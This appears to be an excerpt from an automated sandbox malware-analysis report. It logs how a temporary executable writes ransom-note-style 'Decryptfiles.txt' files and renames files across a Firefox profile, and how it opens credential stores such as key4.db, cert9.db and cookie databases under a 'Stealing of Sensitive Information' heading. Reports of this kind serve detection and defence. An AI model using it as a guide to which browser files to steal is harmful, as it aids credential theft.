Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526932.a88cd073-7a8b-423f-bd0e-4c9cfe05f0fa.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526932.a88cd073-7a8b-423f-bd0e-4c9cfe05f0fa.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526938.6f88a504-672b-429f-becc-5f24bfcb1009.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526938.6f88a504-672b-429f-becc-5f24bfcb1009.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526939.711b9395-807b-4c7f-a045-dd83b14de7aa.first-shutdown.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532955.5c52a77f-c922-4d05-b4a5-35092432cb64.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.270e063c-5835-4e21-b776-167913525107.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.270e063c-5835-4e21-b776-167913525107.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.f626f4c3-4652-4b17-a31d-20b62aabb4bc.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532994.855442d8-08ff-437c-ab54-8b85f7a1de31.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532994.855442d8-08ff-437c-ab54-8b85f7a1de31.main.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\db\data.safe.bin
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\background-update
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\cb77fc44-213e-46f2-a233-e27b26b3b3e2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\tmp\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\session-state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\f30d6b3f-1d43-4dd4-add9-f29c1313c2dd
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\extension-preferences.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\favicons.sqlite-wal.NEgp
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\handlers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\minidumps\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\parent.lock.hMVA
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-wal.Fniq
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\protections.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\5c52a77f-c922-4d05-b4a5-35092432cb64
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\6f88a504-672b-429f-becc-5f24bfcb1009
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\6f88a504-672b-429f-becc-5f24bfcb1009
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\security_state\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\search.json.mozlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionCheckpoints.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\previous.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\shield-preference-experiments.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\default\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\.metadata-v2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-wal.gpUZ
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-wal.gMnV
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-wal.Frcy
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-wal.ZAPo
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite-wal.gJTK
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-wal.hMBY
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\temporary\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\to-be-removed\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\targeting.snapshot.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\targeting.snapshot.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ca4gppea.default\Decryptfiles.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\xulstore.json.DUlr
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite-wal.JIwl
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\webappsstore.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile written: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Stealing of Sensitive Information

barindex
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\ExperimentStoreData.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\saved-telemetry-pings\5c52a77f-c922-4d05-b4a5-35092432cb64
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite-wal
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.270e063c-5835-4e21-b776-167913525107.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\pkcs11.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionCheckpoints.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\permissions.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496532976.f626f4c3-4652-4b17-a31d-20b62aabb4bc.health.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite-shm
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\search.json.mozlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqlite
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\archived\2023-10\1696496526932.a88cd073-7a8b-423f-bd0e-4c9cfe05f0fa.event.jsonlz4
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\cb77fc44-213e-46f2-a233-e27b26b3b3e2
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\state.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\sessionstore-backups\upgrade.jsonlz4-20230927232528
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\pending_pings\f30d6b3f-1d43-4dd4-add9-f29c1313c2dd
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\SiteSecurityServiceState.txt
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\containers.json
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\datareporting\glean\events\events
Source: C:\Users\user\AppData\Local\Temp\eryy65ty.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\content-prefs.sqlite
